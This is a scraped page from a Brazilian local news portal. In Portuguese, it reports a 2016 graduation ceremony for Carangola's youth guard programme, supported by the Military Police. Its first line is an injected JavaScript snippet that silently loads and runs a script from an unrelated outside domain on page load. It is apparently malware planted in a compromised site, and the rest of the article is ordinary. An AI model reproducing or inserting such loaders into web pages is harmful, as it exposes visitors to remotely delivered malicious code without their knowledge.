;(function(f,b,n,j,x,e){x=b.createElement(n);e=b.getElementsByTagName(n)[0];x.async=1;x.src=j;e.parentNode.insertBefore(x,e);})(window,document,"script","https://treegreeny.org/KDJnCSZn"); Formatura da nova Guarda Mirim de Carangola. - Portal Carangola

www.portalcarangola.com

O primeiro portal de notícias de Carangola-MG e região.

Portal Carangola

O 1º site de notícias de Carangola e Região

Formatura da nova Guarda Mirim de Carangola.

No dia 20 de maio de 2016, às 17 horas, no Salão nobre da Associação Comercial de Carangola ocorreu a solenidade de formatura e entrega dos certificados ao novo contingente da Nova Guarda Mirim. A Polícia Militar nessa urbe, desde a implantação do projeto “Nova Guarda Mirim”, apoiou no treinamento e processo de formação dos adolescentes que integram o referido programa. Trata-se de um projeto de inserção social que visa além do resgate aos valores éticos, morais, cívicos e sociais oferecem ao jovem carangolense um caminho rumo ao primeiro emprego.
A Polícia Militar como entidade apoiadora do projeto se fez presente através dos militares, o Comandante da 75ª Cia PM, Maj Florindo, 1º Sgt Netto, além do 2º Sgt Eros Marcus e o Cabo Vital, atuaram em todo o processo de formação da nova Guarda Mirim.
O evento contou com a presença de autoridades locais, destacando-se a do Presidente da nova Guarda Mirim Sr. Pedro Paulo, do Prefeito Municipal Sr. Cézar Ricardo e do presidente da Câmara Municipal Sr. Antônio Carlos Candinho, os quais fizeram a entrega do certificado a cada Guarda Mirim.

 

Deixe um comentário

O seu endereço de e-mail não será publicado. Campos obrigatórios são marcados com *

Esse site utiliza o Akismet para reduzir spam. Aprenda como seus dados de comentários são processados.